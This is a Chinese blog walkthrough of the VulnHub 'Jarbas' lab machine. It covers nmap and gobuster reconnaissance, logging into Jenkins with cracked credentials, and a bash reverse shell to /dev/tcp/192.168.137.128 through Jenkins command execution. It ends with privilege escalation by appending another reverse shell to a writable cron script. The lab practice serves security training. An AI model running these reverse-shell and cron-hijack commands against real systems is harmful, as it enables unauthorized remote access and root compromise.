文章总结： 文档记录了VulnHub靶机Jarbas的渗透实战。攻击者利用Nmap完成信息搜集，发现Jenkins服务，经目录扫描破解access.html中的加密凭据成功登录。随后借由Jenkins命令执行功能获取初始Shell，最终通过覆写定时任务脚本实现提权。该文复现了典型Jenkins渗透流程，具备较高参考价值。 综合评分： 83 文章分类： 渗透测试,实战经验,WEB安全,红队

跟着红队笔记打靶：jarbas

原创

网安热爱者week 网安热爱者week

week的杂货铺

2026年3月6日 21:38 江苏

靶场地址：

https://www.vulnhub.com/entry/jarbas-1,232/

大佬的视频：

【「红队笔记」靶机精讲：JARBAS – Jenkins渗透原理详解，一个典型CMS渗透测试样本。】https://www.bilibili.com/video/BV1jm4y1A7Tm?vd_source=3caf2dac9c9273de4d9b0fead4712250

1. 信息搜集：

1.1. 主机发现

sudo nmap -sn 192.168.137.0/24

140是靶机

1.2. 端口扫描：

sudo nmap --min-rate 1000 -sT -p- 192.168.137.140 -oA ./nmapscan/ports

cat ./ports.nmap | grep open | awk -F "/" '{print $1}' | paste -sd ','

ports=$(cat ./ports.nmap | grep open | awk -F "/" '{print $1}' | paste -sd ',')

1.3. 详细扫描：

1.3.1. TCP:

sudo nmap -sT -sV -sC -O -p$ports 192.168.137.139 -oA ./nmapscan/details

这里的8080是jenkins

试了一下 CVE-2018-1000861 的poc,没成功。

1.3.2. UDP：

sudo nmap -sU --top-ports 20 192.168.137.140 -oA ./udp

1.4. 默认脚本扫描：

2. 渗透测试：

2.1. 网页：

2.1.1. 目录扫描：

sudo gobuster dir -u http://192.168.137.140 --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x html,php,jsp

有一个access.html访问一下：

解密之后是：

使用最后一个密码就能登录进去了

eder vipsu

那登录进去了的话 就是很经典的jenkins执行命令了。

输入这个：

/bin/bash -i >& /dev/tcp/192.168.137.128/5566 0>&1

kali记得开监听

可以看一下计划任务：

cat /etc/crontab

发现这个文件可以写入

echo "/bin/bash -i >& /dev/tcp/192.168.137.128/4444 0>&1" >> /etc/script/CleaningScript.sh

等一段时间就可以了~

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：week的杂货铺 网安热爱者week 网安热爱者week《跟着红队笔记打靶：jarbas》